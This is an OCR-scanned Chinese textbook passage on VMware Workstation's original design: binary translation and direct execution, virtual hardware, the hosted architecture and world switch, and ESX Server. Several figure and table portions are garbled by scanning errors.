2) x86 体 系 结构 的 高 度 复杂 性 。 它 是 一 个 众所周知 相当 复杂 的 CISC 体 系 结构 ， 包 含 了 几 十 年 的 向 后 
兼容 性 支持 。 这 些 年 来 ，x86 一 共 引 入 了 四 个 主要 的 运行 模式 ( 实 模 式 、 保 护 模 式 、 虚 拟 8086 模 式 和 系 
统管 理 模式 ) ， 每 种 模式 具有 不 同 的 硬件 分 段 寻 址 模型 、 分 页 机 制 、 特 权 级 别 设置 和 安全 特征 〈 例 如 调 
用 门 ) 。 

3) x86 机 器 具有 多 种 周边 设备 。 虽 然 只 有 两 个 主要 的 x86 处 理 器 生产 商 ， 但 是 个 人 计算 机 可 能 包含 
许多 种 类 的 扩展 卡 和 设备 ， 每 个 都 有 自己 的 驱动 程序 。 虚 拟 化 所 有 这 些 周 边 设备 是 不 可 行 的 ， 无 论 前 端 
(虚拟 机 中 的 虚拟 硬件 ) 还 是 后 端 (虚拟 机 管理 程序 需要 控制 的 真实 硬件 )。 

4) 需要 有 简单 的 用 户 体验 。 以 前 的 经 典 虚拟 机 管理 程序 是 在 工厂 中 安装 好 的 ， 类 似 于 今天 计算 机 中 
的 固件 程序 。 由 于 VMware 刚 起 步 ， 因 此 用 户 需 要 在 现 有 的 硬件 上 进行 安装 。VMware 需 要 一 种 具有 简单 
安装 体验 的 软件 交付 模型 ， 以 利于 推广 。 


7.12.4 VMware Workstation 解 决 方案 概览 

本 节 将 在 一 个 较 高 的 层面 上 描述 VMware Workstation 如 何 应 对 前 面 提 到 的 挑战 。 

VMware Workstation 是 一 个 包含 了 多 个 模块 的 第 二 类 虚拟 机 管理 程序 。 一 个 重要 模块 是 YVMM， 负 
责 执 行 虚拟 机 的 指令 。 另 一 个 重要 模块 是 VMX， 人 负责 与 宿主 操作 系统 交互 。 

本 节 首 先 介 绍 VMM 如 何 解 决 x86 体 系 结构 不 可 虚拟 化 的 问题 。 然 后 描述 设计 者 们 在 整个 开发 过 程 中 
使 用 的 以 操作 系统 为 中 心 的 策略 。 接 下 来 描述 虚拟 硬件 平台 的 设计 ， 解 决 了 外 围 设备 多 样 性 带 来 的 一 部 
分 挑战 。 最 后 ， 讨 论 宿主 操作 系统 在 VMware Workstation 中 的 角色 ,特别 是 VMM 和 VMX 模 块 的 交互 。 

1. 虚拟 化 x86 体 系 结构 

VMM 负 责 运行 实际 的 虚拟 机 。 为 可 虚拟 化 的 体系 结构 设计 的 VMM 使 用 陷入 并 模拟 的 技术 直接 且 安 
全 地 在 硬件 上 执行 虚拟 机 的 指令 序列 。 当 陷入 并 模拟 无 法 实现 时 ， 一 种 办 法 是 指定 处 理 器 体系 结构 的 可 
虚拟 化 子 集 ， 并 将 客户 操作 系统 移植 到 新 定义 的 平台 上 。 这 种 技术 称 作 半 虚拟 化 (Barham 等 人 ， 
2003，Whitaker 等 人 ，2002)， 需 要 在 源 代码 级 别 修改 操作 系统 。 简 单 地 说 就 是 半 虚 拟 化 技术 通过 修改 
客户 操作 系统 来 避免 虚拟 机 管理 程序 无 法 处 理 的 操作 。 半 虚拟 化 对 VMware 来 说 是 不 可 行 的 ， 一 方面 是 
兼容 性 要 求 ， 另 一 方面 是 需要 运行 没有 源 代码 的 操作 系统 ， 特 别 是 Windows。 

另 一 个 办 法 是 采用 完全 模拟 的 方式 ，VMM 模 拟 (而 不 是 直接 在 硬件 上 ) 执行 虚拟 机 的 指令 。 这 种 
方式 可 以 做 到 相当 高 效 ，SimOS (Rosenblum 等 人 ，1997) 仿真 器 上 的 经 验 表 明 使 用 动态 二 进 制 翻译 技 
术 运 行 用 户 程序 可 以 将 完全 模拟 的 性 能 开销 降 至 1/5。 虽 然 这 确实 高 效 ， 在 仿真 用 途上 也 很 有 价值 ， 但 
是 1/5 的 性 能 降低 对 VMware 而 言 还 不 够 ， 不 能 满足 期 望 的 性 能 要 求 。 

这 一 问题 的 解决 方案 包含 了 两 个 关键 点 。 首 先 ， 陷 入 并 模拟 式 的 直接 执行 虽然 不 能 用 来 虚拟 化 整个 
x86 体 系 结构 ， 但 在 某 些 时 候 确实 可 用 于 x86 虚 拟 化 ， 例 如 执行 用 户 态 程序 的 时 间 ， 这 占 了 相关 工作 负载 
的 大 多 数 执行 时 间 。 这 是 因为 这 些 虚 拟 化 敏感 指令 并 不 总 是 敏感 的 ， 它 们 只 在 特定 情况 下 是 敏感 的 。 例 
如 ， 当 软件 可 以 关中 断 (如 运行 操作 系统 ) 时 POPF 指 令 才 是 虚拟 化 敏感 的 ， 否 则 (运行 几乎 所 有 用 户 
程序 时 ) 就 不 是 。 

图 7-8 展 示 了 原始 VMware VMM 的 模块 化 组 成 部 分 。 可 以 看 到 ， 它 包含 直接 执行 子 系 统 、 二 进 制 翻 
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译 子 系统 和 用 于 判断 使 用 哪个 子 系统 的 决策 算法 。 两 个 子 系统 都 依赖 于 某 些 共享 模块 ， 例 如 通过 影子 页 
表 虚 拟 化 内 存 的 模块 和 模拟 IO 设备 的 模块 。 


共享 模块 (影子 页 表 、 模 拟 /O 设 备 等 ) 





图 7-8 VMware 虚拟 机 管理 程序 构件 图 


优先 考虑 直接 执行 子 系统 ， 不 能 直接 执行 时 ， 动 态 二 进 制 翻译 子 系统 提供 了 回 退 机 制 。 每 当 虚 拟 机 
可 能 发 出 虚拟 化 敏感 指令 时 ， 就 会 出 现 回 退 的 情况 。 因 此 ， 每 个 子 系统 不 断 地 重新 执行 决策 算法 以 确定 
子 系统 切换 是 否 可 行 (从 二 进 制 翻译 到 直接 执行 ) 或 必要 (从 直接 执行 到 二 进 制 翻译 ) 。 决 策 算法 有 一 
些 输入 参数 ， 如 虚拟 机 当前 所 处 的 特权 级 、 当 前 是 否 可 以 开 中 断 、 段 的 内 容 等 。 例 如 ， 以 下 任意 条 件 成 
立时 就 必须 使 用 二 进 制 翻译 子 系统 : 

1) 虚拟 机 当前 运行 在 内 核 态 (x86 体 系 结构 下 的 特权 级 0)。 

2) 虚拟 机 可 以 关中 断 和 执行 IO 指令 〈 在 x86 体 系 结构 下 即 当前 特权 级 具有 IO 权限 ) 。 

3) 虚拟 机 当前 运行 在 实 模式 (BIOS 使 用 的 16 位 执行 模式 ) 下 。 

实际 的 决策 算法 还 有 一 些 附加 条 件 ， 具 体 细 节 可 以 在 Bugnion 等 人 (2012) 的 文献 中 找到 。 有 趣 的 
是 算法 并 不 依赖 于 内 存 中 存储 及 可 能 执行 的 指令 ， 而 只 依赖 于 一 些 虚拟 寄存 器 的 值 。 因 此 ， 算 法 可 以 只 
使 用 少量 指令 高 效 地 执行 。 

第 二 个 关键 点 是 通过 适当 配置 硬件 ， 特 别 是 精心 使 用 x86 段 保护 机 制 ， 动 态 二 进 制 翻译 的 系统 代码 
也 能 以 接近 原生 的 速度 执行 。 这 与 仿真 器 通常 期 望 的 1/5 性 能 降低 有 很 大 不 同 。 

这 一 差异 可 以 通过 比较 动态 二 进 制 翻译 器 如 何 转换 一 条 简单 的 访 存 指令 来 解释 。 要 软件 模拟 这 样 一 
条 指令 ， 经 典 的 模拟 整个 x86 指 令 系统 体系 结构 的 动态 二 进 制 翻译 器 首先 要 验证 有 效 地 址 是 否 在 数据 段 
的 范围 内 ， 然 后 转换 成 物理 地 址 ， 最 后 将 引用 的 字 复 制 到 模拟 的 寄存 器 中 。 当 然 ， 这 些 步骤 可 以 通过 组 
存 的 方式 进行 优化 ， 就 像 处 理 器 在 TLB 中 缓存 页 表 映 射 一 样 。 但 是 ， 即 使 有 这 些 优 化 ， 仍 会 将 一 条 指令 
扩展 成 一 个 指令 序列 。 

而 VMware 的 二 进 制 翻译 器 不 会 在 软件 层面 执行 这 些 步 骤 。 它 会 配置 硬件 ， 使 这 条 简单 指令 能 原封 
不 动 地 保留 在 翻译 后 的 指令 序列 中 。VMware VMM (二 进 制 翻译 器 是 其 中 一 部 分 ) 配置 硬件 使 之 完全 
对 应 虚拟 机 的 设置 ， 使 用 影子 页 表 以 确保 MMU 能 直接 使 用 而 无 需 模拟 ,使 用 与 影子 页 表 相似 的 办 法 处 
理 段 描 述 符 表 (在 老式 x86 操 作 系 统 运行 16 位 和 32 位 软件 时 发 挥 了 重要 作用 )。 

当然 ，VMware VMM 中 还 有 一 些 复 杂 且 精妙 之 处 。 其 设计 的 一 个 重要 方面 就 是 保证 虚拟 化 沙 盒 的 
完整 性 ， 即 确保 虚拟 机 中 运行 的 软件 (包括 恶意 软件 ) 不 能 自 改 YMM。 这 一 问题 通常 称 作 软 件 故障 隔 
离 (software fault isolation) ， 如 果 用 软件 实现 ， 会 增加 每 次 访 存 的 运行 时 开销 。VMware VMM 同 样 使 
用 了 基于 硬件 的 方式 。 它 将 地 址 空间 分 成 不 相交 的 两 部 分 ， 自 己 使 用 顶部 的 4MB 地 址 空间 ， 剩 下 的 部 分 
虚拟 机 可 用 。VMM 配 置 硬件 段 式 内 存 管理 ， 使 得 任何 虚拟 机 指令 (包括 二 进 制 翻译 器 生成 的 指令 ) 都 
不 能 访问 地 址 空间 顶部 的 4MB 区 域 。 

2. 以 客户 操作 系统 为 中 心 的 策略 

理想 情况 下 ，VMM 在 设计 上 不 用 考虑 虚拟 机 上 运行 的 客户 操作 系统 及 其 如 何 配置 硬件 。 虚 拟 化 背 
后 的 思想 是 让 虚拟 机 接口 与 硬件 接口 一 致 ， 以 使 所 有 能 在 硬件 上 运行 的 软件 也 能 在 虚拟 机 上 运行 。 可 惜 ， 
这 种 方式 只 有 体系 结构 可 虚拟 化 且 简 单 时 才 可 行 。 而 x86 体 系 结构 的 极 大 复杂 性 显然 是 个 问题 。 

为 了 简化 此 问题 ，VMware 的 工程 师 们 选择 性 地 支持 一 些 特定 的 客户 操作 系统 。 在 首 个 版 本 中 ， 
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VMware Workstation 仅 正式 支持 Linux、Windows 3.1, Windows 95/98 和 Windows NT 作为 客户 操作 系统 。 
这 些 年 来 ， 新 的 操作 系统 随 着 VMware 的 新 版 本 添加 到 这 一 列表 中 。 尽 管 如 此 ，VMware 直 接 运行 MINIX 
3 等 不 在 列表 中 的 操作 系统 时 仍 能 很 好 地 模拟 。 

这 一 简化 没有 改变 总 体 设计 ，VMM 仍 能 提供 底层 硬件 的 可 靠 复 制品 。 但 这 一 简化 是 对 开发 过 程 的 
有 益 指导 ， 工 程 师 们 只 需要 关心 受 支 持 的 客户 操作 系统 中 实际 用 到 的 硬件 功能 。 

例如 ，x86 体 系 结构 在 保护 模式 下 包含 4 个 特权 级 (0~3) ， 而 实际 情况 下 没有 操作 系统 用 到 特权 级 1 
和 2 (除了 IBM 的 早已 消亡 的 OS/2 操 作 系统 外 ) 。 因 此 ，VMware VMM 不 必 操 心 怎样 正确 虚拟 化 特权 级 1 和 

只 需要 简单 地 检测 客户 机 是 否 尝试 进入 特权 级 1 和 2， 检 测 到 就 终止 虚拟 机 的 执行 。 这 样 做 不 仅 去 掉 了 
不 必要 的 代码 ， 更 重要 的 是 还 允许 YMware VMM 假 设 特权 级 1 和 2 永远 不 会 被 虚拟 机 用 到 ， 可 以 供 VMware 
VMM 自 己 使 用 。 实 际 上 ，VMware VMM 的 二 进 制 翻译 器 运行 于 特权 级 1 以 虚拟 化 特权 级 0 的 代码 。 

3. 虚拟 硬件 平台 

目前 为 止 ， 主 要 讨论 了 与 x86 处 理 器 虚拟 化 相关 的 问题 。 但 基于 x86 的 计算 机 远 不 止 是 处 理 器 ， 还 有 
芯片 组 、 固 件 以 及 控制 磁盘 、 网 卡 、CD-ROM、 键 盘 的 IO 设备 等 。 

在 x86 个 人 计算 机 上 ，IO 外 围 设备 的 多 样 性 使 虚拟 硬件 不 可 能 匹配 真实 的 底层 硬件 。 即 使 市 场 上 只 
有 少量 x86 处 理 器 ， 且 只 在 指令 系统 级 别 的 功能 上 有 很 小 的 差异 ， 但 IO 设备 却 成 千 上 万 ， 而 且 大 多 数 没 
有 公开 的 接口 或 功能 文档 。VMware 设 计 的 关键 点 不 是 让 虚拟 机 匹配 特定 底层 硬件 ， 而 是 让 其 匹配 选 定 的 
标准 IO 设备 组 成 的 配置 。 客 户 操作 系统 可 以 用 它们 自己 已 有 的 内 建 机 制 检测 并 操纵 这 些 (虚拟 ) 设备 。 

虚拟 化 平台 由 复 用 的 和 模拟 的 部 件 组 合 而 成 。 复 用 是 指 配置 硬件 以 使 其 可 以 直接 被 虚拟 机 使 用 ， 并 
在 多 个 虚拟 机 间 (空间 上 或 时 间 上 ) 共享 。 模 拟 是 指向 虚拟 机 提供 选 定 的 标准 硬件 部 件 的 软件 仿真 。 图 
7-9 展 示 了 VMware Workstation 将 复 用 应 用 于 处 理 器 和 内 存 ， 将 模拟 应 用 于 其 他 设备 。 


| anme co) 
1 个 虚拟 x86 CPU， 使 用 与 硬件 CPU 相同 | 由 宿主 操作 系统 调度 ， 宿 主 既 可 以 是 单 

E | 的 指令 集 扩展 处 理 器 也 可 以 是 多 处 理 器 

网 


ERREPA 


4 个 IDE 磁 盘 虚拟 磁盘 (存储 为 文件 ) 或 直接 访问 给 
7 个 Buslogic SCSI 磁 盘 定 的 裸 设备 


MDECDROM | CD-ROM 1 个 IDE CD-ROM “|1sO 镜 像 或 模拟 访问 实际 的 CD- ROM 
2 个 1.44MB 软 盘 驱 动 器 物理 软盘 或 软盘 镜像 





















1 个 支持 YGA 和 SVGA 的 VMware 显卡 “| 在 窗口 或 全 屏 模 式 下 运行 。SVGA 需 要 
g VMware SVGA# PRADA 
SSE A ARK PE 


一 个 打印 机 (LPT) 可 以 与 宿主 的 LPT 端 口 连接 


1 个 键盘 (104%) 完全 模拟 的 ， 当 VMware 应 用 接收 到 键 
码 动作 时 生成 键 码 事件 
AER 
图 7-9 早期 (2000 年 左右 ) VMware Workstation 虚 拟 硬件 的 配置 选项 
对 于 复 用 的 设备 ， 每 个 虚拟 机 都 像 是 拥有 独占 CPU 及 从 物理 地 址 0 开始 的 固定 大 小 的 连续 RAM。 
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从 架构 上 讲 ， 每 个 虚拟 设备 的 模拟 都 可 以 分 成 虚拟 机 可 见 的 前 端 部 分 和 与 宿主 操作 系统 交互 的 后 端 
部 分 (Waldspurge 和 Rosenblum，2012) 。 前 端 本 质 上 是 硬件 设备 的 软件 模型 ， 可 以 由 虚拟 机 中 运行 的 未 
修改 的 设备 驱动 程序 控制 。 无 论 主 机 上 相应 的 特定 硬件 是 什么 ， 前 端 总 是 提供 相同 的 设备 模型 。 

例如 ，VMware 首 个 以 太 网 设备 前 端 是 AMD PCnet “Lance” r (PC 上 一 度 流行 的 10Mb/s 扩 展 卡 )， 
而 后 端 提 供 到 主机 物理 网 络 的 连接 。 出 平 意料 的 是 ，Lance 芯 片 退 出 市 场 之 后 很 和 Mware 仍 保留 对 
PCnet 设 备 的 支持 ， 并 且 实 际 IO 比 10Mb/s 快 几 个 数量 级 (Sugerman 等 人 ，2001)。 对 于 存储 设备 ， 最 初 
的 前 端 是 IDE 控 制 器 和 Buslogic 控 制 器 ， 后 端 通常 是 主机 文件 系统 上 的 文件 ， 如 虚拟 磁盘 或 ISO 9660 镜 
像 ， 或 者 是 原始 设备 ， 如 磁盘 分 区 或 物理 CD-ROM 驱 动 器 。 

将 前 端 、 后 端 分 离 还 有 一 个 好 处 : VMware 虚拟 机 可 以 从 一 台 计 算 机 复制 到 另 一 台 计 算 机 ， 两 台 计 
算 机 的 硬件 可 以 不 同 。 而 且 ， 虚 拟 机 不 必 安 装 新 的 设备 驱动 程序 ， 因 为 它 只 用 与 前 端 部 件 打 交道 。 这 个 
性 质 称 作 硬 件 无 关 封 装 (hardware-independent encapsulation)， 在 服务 器 环境 和 云 计算 中 有 巨大 的 好 处 。 
它 带 来 了 后 续 的 创新 ， 如 虚拟 机 暂停 与 恢复 、 检 查 点 、 热 迁移 (Nelson 等 人 ，2005) 等 。 在 云 中 ， 允 许 
客户 在 任意 可 用 的 服务 器 上 部 署 他 们 的 虚拟 机 ， 不 用 担心 底层 硬件 的 细节 。 

4. 宿主 操作 系统 的 角色 

最 后 一 个 要 介绍 的 VMware Workstation 的 重要 设计 决策 是 将 其 部 署 到 已 有 操作 系统 之 上 。 这 一 特点 
将 其 归 为 第 二 类 虚拟 机 管理 程序 。 这 个 选择 有 两 个 主要 好 处 。 

首先 ， 这 解决 了 外 围 设备 多 样 性 带 来 的 另 一 部 分 挑战 (虚拟 硬件 平台 已 解决 了 一 部 分 挑战 )。 
VMware 实现 了 不 同 设备 的 前 端 模 拟 ， 但 后 端 依赖 宿主 操作 系统 的 设备 驱动 程序 。 例 如 ，VMware 
Workstation 读 写 宿主 机 文件 系统 上 的 文件 来 模拟 虚拟 磁盘 设备 ， 在 宿主 机 的 桌面 上 绘制 一 个 窗口 来 模拟 
显示 。 只 要 宿主 操作 系统 有 合适 的 驱动 程序 ，VMware Workstation 就 能 在 上 面 运行 虚拟 机 。 

其 次 ， 产 品 能 像 普通 应 用 程序 那样 安装 使 用 ， 对 用 户 而 言 更 容易 接受 。 与 其 他 应 用 程序 相同 ， 
VMware Workstation 安 装 器 将 组 成 虚拟 机 管理 程序 的 文件 写 入 现 有 的 宿主 机 文件 系统 ， 不 会 扰乱 硬件 配 
置 (不 用 重新 格式 化 磁盘 、 创 建 磁盘 分 区 或 修改 BIOS 设 置 )。 事 实 上 ，VMware Workstation 安 装 完成 后 
不 用 重启 宿主 操作 系统 就 能 开始 运行 虚拟 机 ， 至 少 在 Linux 主 机 上 是 如 此 。 

然而 ， 普 通 应 用 程序 不 具有 能 让 虚拟 机 管理 程序 复 用 CPU 与 内 存 资 源 的 钧 子 和 API， 而 这 些 对 提供 
接近 原生 的 性 能 是 必要 的 。 前 面 描述 的 x86 虚 拟 化 技术 的 核心 部 分 只 有 VMM 运 行 在 内 核 态 时 才 起 作用 。 
VMM 需 要 不 受 任何 限制 地 控制 处 理 器 的 方方面面 ， 包 括 修改 地 址 空间 (以 创建 影子 页 表 )、 段 描述 符 表 
和 所 有 中 断 与 异常 处 理 程序 。 

设备 驱动 程序 对 硬件 有 更 直接 的 访问 权限 ， 尤 其 是 运行 在 内 核 态 时 。 驱 动 程序 虽然 (理论 上 ) 可 以 
执行 任意 敏感 指令 ， 但 是 在 实践 中 是 通过 明确 定义 的 API 与 操作 系统 交互 ， 不 会 (也 不 应 该 ) 任意 重新 
配置 硬件 。 而 由 于 虚拟 机 管理 程序 需要 重 设 硬件 (包括 整个 地 址 空间 、 段 描述 符 表 、 中 断 与 异常 处 理 程 
序 ) ， 因 此 将 虚拟 机 管理 程序 作为 一 个 设备 驱动 程序 (在 内 核 态 ) 运行 不 是 明智 的 选择 。 

为 了 应 对 这 些 苛 刻 的 要 求 ，VMware 托 管 体系 结构 (VMware Hosted Architecture) 诞生 了 。 如 图 7- 
10 所 示 ， 虚 拟 化 软件 被 拆 分 成 三 个 独立 组 成 部 分 。 

这 三 个 部 分 有 不 同 的 功能 ， 彼 此 独立 运行 ， 

1) 用 户 可 以 察觉 到 的 用 户 态 YMware 程 序 (VMX)。VMX 执 行 所 有 UI 功能 ， 启 动 虚拟 机 ， 并 执行 大 
部 分 设备 模拟 (前端 ) ， 向 宿主 操作 系统 发 起 普通 系统 调用 以 完成 后 端 交互 。 通 常 每 个 虚拟 机 对 应 一 个 
多 线程 VMX 进 程 。 

2) 安装 在 宿主 操作 系统 的 内 核 态 设备 驱动 程序 (VMM 驱 动 程序 )。VMM 驱 动 程序 主要 用 于 临时 暂 
停 整 个 宿主 操作 系统 以 允许 VMM 运 行 。 宿 主 操作 系统 通常 在 启动 时 加 载 VYMM 驱 动 程序 。 

3) 包含 复 用 CPU 与 内 存 所 需 全 部 软件 的 VMM， 包 括 异常 处 理 程序 、 陷 入 并 模拟 处 理 程 序 、 二 进 制 
翻译 器 、 影 子 页 表 模 块 。VMM 运 行 在 内 核 态 ， 但 并 非 宿主 操作 系统 的 上 下 文中 。 也 就 是 说 ，VMM 不 能 
直接 依赖 宿主 操作 系统 提供 的 服务 ， 但 它 同 时 也 不 受 宿主 操作 系统 规则 的 约束 。 每 个 虚拟 机 都 有 一 个 在 
虚拟 机 启动 时 创建 的 VMM 实 例 。 
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宿主 操作 系统 上 下 文 VMM 上 下 文 
图 7-10 VMware 的 架构 及 三 个 构件 : VMM、VMM 驱 动 程序 和 VMX 


VMware Workstation 看 起 来 运行 在 现 有 操作 系统 上 ， 实 际 上 VMX 确 实 作 为 操作 系统 的 一 个 进程 运 
行 。 然 而 ，VMM 在 系统 级 别 运行 ， 完 全 控制 硬件 ， 并 且 不 依赖 宿主 操作 系统 。 图 7-10 展 示 了 实体 间 的 
KA: 两 个 上 下 文 (宿主 操作 系统 和 VMM) 相互 对 等 ， 都 由 用 户 态 和 内 核 态 组 成 。 当 VMM 运 行 时 (图 
的 右 半 部 分 )， 它 重 设 硬件 ， 处 理 所 有 I/O 中 断 及 异常 ， 因 此 可 以 安全 地 将 宿主 操作 系统 从 VMM 的 虚拟 
内 存 中 临时 移 除 。 例 如 ，VMM 将 INTR 寄 存 器 设 为 新 值 来 修改 中 断 描述 符 表 的 位 置 。 反 过 来 ， 宿 主 操作 
系统 运行 时 (图 的 左 半 部 分 )，VMM 和 虚拟 机 都 从 虚拟 内 存 中 移 除了 。 

这 两 个 完全 独立 的 系统 级 上 下 文 之 间 的 切换 称 作 系 统 切 换 (world switch)。 这 个 名 称 本 身 强 调 在 切 
换 后 软件 环境 完全 不 同 了 ， 与 操作 系统 实现 的 普通 上 下 文 切换 形成 对 比 。 图 7-11 展 示 了 两 种 切换 的 区 别 。 
进程 A 和 B 的 普通 上 下 文 切换 交换 了 地 址 空间 的 用 户 部 分 ， 以 及 两 个 进程 的 寄存 器 ， 但 许多 关键 系统 资 
源 没 有 变化 。 例 如 ， 所 有 进程 的 内 核 部 分 地 址 空间 相同 ， 异 常 处 理 程序 也 没 变化 。 相 比 之 下 ， 系 统 切换 
改变 了 一 切 : 整个 地 址 空间 ， 所 有 异常 处 理 程 序 ， 特 权 寄 存 器 等 。 宿 主 操作 系统 的 内 核 地 址 空间 只 有 运 
行 在 宿主 操作 系统 上 下 文 时 才 予 以 映射 切换 到 VMM 上 下 文 之 后 就 完全 移 除 了 ， 空 出 来 的 空间 用 于 运 
行 YMM 和 虚拟 机 。 系 统 切换 虽然 听 起 来 复杂 ， 但 是 可 以 很 高 效 地 实现 ， 只 需要 执行 45 条 x86 机 器 指令 。 
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图 7-11 普通 上 下 文 切换 与 系统 切换 的 区 别 


细心 的 读者 可 能 会 好 奇 客户 操作 系统 的 内 核 地 址 空间 情况 如 何 。 答 案 很 简单 ， 它 是 虚拟 机 地 址 空间 
的 一 部 分 ， 只 有 运行 在 VMM 上 下 文 时 才 存 在 。 因 此 ， 客 户 操作 系统 可 以 使 用 整个 地 址 空间 ， 尤 其 是 与 
宿主 操作 系统 相同 的 虚拟 内 存 位置 。 具 体 来 说 这 就 是 宿主 机 与 客户 操作 系统 相同 时 (例如 都 是 Linux) 
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会 发 生 的 情况 。 当 然 ， 这 一 切 能 正确 执行 是 因为 存在 两 个 独立 的 上 下 文 以 及 它们 之 间 的 系统 切换 。 

读者 可 能 还 会 好 奇 地 址 空间 顶部 的 VMM 区 域 情况 如 何 。 前 面 讨论 过 ， 这 块 区 域 为 YMM 自 身 保留 ， 
相应 的 地 址 空间 不 能 被 虚拟 机 直接 使 用 。 幸 运 的 是 ， 客 户 操作 系统 不 会 经 常 访 问 这 块 4MB 的 小 区 域 。 因 
为 一 旦 访问 ， 就 需要 另外 进行 模拟 ， 引 入 可 观 的 性 能 开销 。 

回 到 图 7-10， 它 还 进一步 展示 了 VMM 执 行 时 发 生 磁盘 中 断 (第 1 步 ) 的 各 个 步骤 。 当 然 ，VMM 不 
能 处 理 此 中 断 ， 因 为 它 没有 后 端 设备 驱动 程序 。 第 2 步 ， VMM 通 过 系统 切换 回 到 宿主 操作 系统 。 具 体 来 
说 是 返回 VMM 驱 动 程序 ， 并 在 第 3 步 模 拟 磁盘 发 出 的 中 断 。 第 4 步 ， 宿 主 操作 系统 的 中 断 处 理 程 序 运行 ， 
就 好 像 中 断 是 在 VMM 驱 动 程序 (不 是 VMM1 ) 运行 过 程 中 发 生 的 那样 。 最 终 ， 第 5 步 ， VMM 驱 动 程序 
将 控制 流 交 还 VMX 进 程 。 这 时 ， 宿 主 操作 系统 可 以 选择 调度 其 他 进程 ， 或 者 继续 运行 VMware VMX 进 
程 。 如 果 VMX 进 程 继续 运行 ， 就 会 调用 VMM 驱 动 程序 ， 通 过 系统 切换 返回 VMM 上 下 文 ， 恢 复 虚拟 机 
的 执行 。 可 以 看 到 ， 这 个 巧妙 的 花招 对 宿主 操作 系统 隐瞒 了 整个 VMM 和 虚拟 机 。 更 重要 的 是 ， 它 允许 
VMM 按 需 重新 调整 硬件 。 


7.12.5 VMware Workstation 的 演变 

原始 VMware 虚拟 机 管理 程序 开发 之 后 的 十 年 ， 虚 拟 化 相关 技术 的 状况 发 生 了 巨大 改变 。 

托管 体系 结构 目前 仍 用 在 最 新 型 的 交互 式 虚拟 机 管理 程序 上 ， 例 如 VMware Workstation, VMware 
Player, VMware Fusion (针对 Apple OS X 宿 主 操作 系统 的 产品 ) ， 甚 至 是 VMware 针对 智能 手机 的 产品 
(Barr 等 人 ，2010)。 系 统 切 换 及 其 隔离 宿主 操作 系统 上 下 文 与 YMM 上 下 文 的 能 力 ， 仍 然 是 VMware 的 托 
管 虚拟 化 产品 的 基本 实现 机 制 。 虽 然 系统 切换 的 实现 方式 这 些 年 来 在 逐步 发 展 ， 例 如 增加 了 对 64 位 系统 
的 支持 ， 但 是 让 宿主 操作 系统 和 VMM 地 址 空间 完全 隔离 的 基本 思想 今天 仍然 有 效 。 

相 比 之 下 ， 随 着 硬件 辅助 虚拟 化 的 引入 ，x86 体 系 结构 的 虚拟 化 方法 有 了 显著 改变 。Intel VT-x 和 
AMD-v 等 硬件 辅助 虚拟 化 分 两 阶段 引入 。 第 一 阶段 始 于 2005 年 ， 以 消除 对 半 虚 拟 化 或 二 进 制 翻译 的 依赖 
为 目的 (Uhlig 等 人 ，2005)。2007 年 起 ， 第 二 阶段 提供 婴 套 页 表 形 式 的 MMU 硬 件 支持 ， 消 除 软 件 维护 
影子 页 表 的 需求 。 今 天 ， 如 果 处 理 器 支持 虚拟 化 和 了 鱼 套 页 表 ，VMware 的 虚拟 机 管理 程序 就 可 以 以 使 用 
基于 硬件 的 陷入 并 模拟 方法 为 主 (40 年 前 即 由 Popek 和 Goldberg 形 式 化 提出 )。 

虚拟 化 硬件 支持 的 出 现 对 VMware 以 客户 操作 系统 为 中 心 的 策略 有 重大 影响 。 在 原始 VMware 
Workstation 中 ， 这 种 策略 以 牺牲 对 完整 体系 结构 的 兼容 来 极 大 地 降低 实现 复杂 度 。 今 天 ， 由 于 有 了 硬件 
支持 ， 就 不 必 会 弃 完 整体 系 结构 的 兼容 性 。 当 前 VMware 的 策略 关注 的 是 针对 选 定 的 客户 操作 系统 进 一 
步 优化 性 能 。 


7.12.6 VMware 的 第 一 类 虚拟 机 管理 程序 ESX Server 

VMware 于 2001 年 面向 服务 器 市 场 发 布 了 另 一 款 名 为 ESX Server 的 产品 。 在 此 产品 中 ，VMware 的 
工程 师 们 尝试 了 另 一 种 虚拟 化 方式 ， 构 建 了 可 以 直接 运行 在 硬件 上 的 第 一 类 虚拟 化 解决 方案 ， 而 不 是 需 
要 运行 在 宿主 操作 系统 上 的 第 二 类 虚拟 化 解决 方案 。 

图 7-12 展 示 了 ESX Server 的 高 层 体 系 结构 。 它 结合 了 已 有 的 VMM 部 件 和 一 个 直接 运行 在 裸 机 上 的 
真正 的 虚拟 机 管理 程序 。VMM 执 行 的 功能 与 在 


VMware Workstation 中 相同 ， 即 在 一 个 复制 的 x86 体 Cm ) (wm ) (wm ) (wm ) 


系 结构 隔离 环境 中 运行 虚拟 机 。 实 际 上 ， 两 款 产 品 


中 的 VMM 基 于 同一 个 源 代码 库 ， 大 部 分 内 容 是 相同 „| CO 
的 。ESX 虚 拟 机 管理 程序 替换 了 宿主 操作 系统 的 功 u 
能 ， 但 它 的 目标 只 是 运行 各 种 VMM 实 例 并 有 效 管理 - 
机 器 的 物理 资源 ， 而 不 需要 实现 操作 系统 的 完整 功 Aan ee r 


能 。 因 此 ，ESX Server 只 包含 操作 系统 中 常见 的 子 ; 
系统 ， 例 如 CPU 调度 器 、 内 存 管理 器 和 I/O 子 系统 ,图 7 12 YMwar 的 第 “类 上 所 机 管理 程 放 ESX Server 
每 个 子 系统 都 为 运行 虚拟 机 而 专门 优化 。 

由 于 没有 宿主 操作 系统 ，VMware 需 要 直面 之 前 描述 过 的 外 围 设备 多 样 性 和 用 户 体验 问题 。 对 于 外 
围 设备 多 样 性 ，VMware 限 制 ESX Server 只 运行 在 著名 且 经 过 认证 的 服务 器 平台 上 ， 驱 动 程序 已 经 包含 
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在 ESX Server 里 。 对 于 用 户 体验 ，ESX Server 要 求 用 户 在 启动 分 区 上 安装 新 的 系统 镜像 。 

虽然 存在 不 足 ， 但 在 这 两 方面 的 妥协 对 专门 部 署 虚拟 化 的 数据 中 心 是 合理 的 ， 数 据 中 心里 可 能 有 上 
千 台 服务 器 部 署 了 几 千 个 虚拟 机 。 今 天 通常 将 此 类 虚拟 化 部 署 称 作 私 有 云 。 在 私有 云 里 ，ESX Server 的 
体系 结构 在 性 能 、 伸 缩 性 、 可 管理 性 、 功 能 等 方面 提供 了 巨大 优势 。 例 如 

1) CPU 调度 器 确保 每 个 虚拟 机 公平 地 分 享 CPU (以 避免 饥 钱 )， 还 能 让 多 处 理 器 虚拟 机 的 不 同 虚 拟 
CPU 同时 调度 运行 。 

2) 内 存 管理 器 为 伸缩 性 进行 了 优化 ， 特 别 是 当 虚 拟 机 需要 的 物理 内 存 总 量 超过 物理 机 实际 内 存 大 小 
